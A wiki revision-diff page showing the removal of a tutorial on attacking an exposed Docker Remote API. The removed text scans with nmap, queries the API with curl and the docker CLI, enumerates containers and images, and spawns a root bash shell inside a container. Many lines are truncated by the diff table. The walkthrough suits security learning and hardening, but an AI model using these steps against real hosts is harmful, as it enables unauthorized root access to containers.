docker:attack_docker_exposed_api
Differences
This shows you the differences between two versions of the page.
| Both sides previous revisionPrevious revisionNext revision | Previous revision | ||
| docker:attack_docker_exposed_api [2020/04/09 12:01] – peter | docker:attack_docker_exposed_api [2020/05/13 08:31] (current) – removed peter | ||
|---|---|---|---|
| Line 1: | Line 1: | ||
| - | ====== Docker - Attack Docker exposed API ====== | ||
| - | |||
| - | If you have enabled Docker Remote API, per [[Docker: | ||
| - | |||
| - | ---- | ||
| - | |||
| - | Information Gathering & Enumeration | ||
| - | |||
| - | ===== Do a port scan ===== | ||
| - | |||
| - | <code bash> | ||
| - | sudo nmap -sS -T5 192.168.1.118 -p-Starting Nmap 7.01 ( https:// | ||
| - | Nmap scan report for 192.168.1.118 | ||
| - | Host is up (0.00076s latency). | ||
| - | Not shown: 65498 closed ports, 35 filtered ports | ||
| - | PORT STATE SERVICE | ||
| - | 22/ | ||
| - | 1234/tcp open docker | ||
| - | MAC Address: 0C: | ||
| - | </ | ||
| - | |||
| - | I had to scan more ports that the default top 1000 because the docker API port is not included :( | ||
| - | Ok then, what about service detection? | ||
| - | |||
| - | <code bash> | ||
| - | nmap -sTV -p 1234 192.168.1.118 | ||
| - | |||
| - | Starting Nmap 7.01 ( https:// | ||
| - | Nmap scan report for 192.168.1.118 | ||
| - | Host is up (0.00038s latency). | ||
| - | PORT STATE SERVICE | ||
| - | 1234/tcp open 18.06.0-ce Docker | ||
| - | |||
| - | Service detection performed. Please report any incorrect results at https:// | ||
| - | Nmap done: 1 IP address (1 host up) scanned in 75.65 seconds | ||
| - | </ | ||
| - | |||
| - | This confirm that we are dealing with Docker. | ||
| - | |||
| - | nmap also discovered the exact version of Docker. | ||
| - | |||
| - | <code bash> | ||
| - | curl -s http:// | ||
| - | </ | ||
| - | |||
| - | <WRAP info> | ||
| - | **NOTE:** Claudio Criscione wrote a nmap script to do this ([[https:// | ||
| - | </ | ||
| - | |||
| - | ---- | ||
| - | |||
| - | ===== Test the exposed API using the docker CLI ===== | ||
| - | |||
| - | <code bash> | ||
| - | docker -H 192.168.1.118: | ||
| - | </ | ||
| - | |||
| - | ---- | ||
| - | |||
| - | ==== Gather Information ==== | ||
| - | |||
| - | Are there some containers running? | ||
| - | |||
| - | <code bash> | ||
| - | docker -H 192.168.1.118: | ||
| - | </ | ||
| - | |||
| - | ---- | ||
| - | |||
| - | Are there some stopped containers? | ||
| - | |||
| - | <code bash> | ||
| - | docker -H 192.168.1.118: | ||
| - | |||
| - | What are the images pulled on the host machine? | ||
| - | |||
| - | |||
| - | <code bash> | ||
| - | docker -H 192.168.1.118: | ||
| - | </ | ||
| - | |||
| - | ---- | ||
| - | |||
| - | ===== Accessing the container ===== | ||
| - | |||
| - | Spawn a bash shell: | ||
| - | |||
| - | <code bash> | ||
| - | docker -H 192.168.1.118: | ||
| - | </ | ||
| - | |||
| - | Check ownership: | ||
| - | |||
| - | |||
| - | <code bash> | ||
| - | whoami && id | ||
| - | root | ||
| - | uid=0(root) gid=0(root) groups=0(root) | ||
| - | </ | ||
| - | |||
| - | <WRAP info> | ||
| - | **NOTE: | ||
| - | |||
| - | The default user inside a container is **root**. | ||
| - | |||
| - | Once inside a container you can start digging for some useful information. | ||
| - | </ | ||
| - | |||
docker/attack_docker_exposed_api.1586433691.txt.gz · Last modified: 2020/07/15 09:30 (external edit)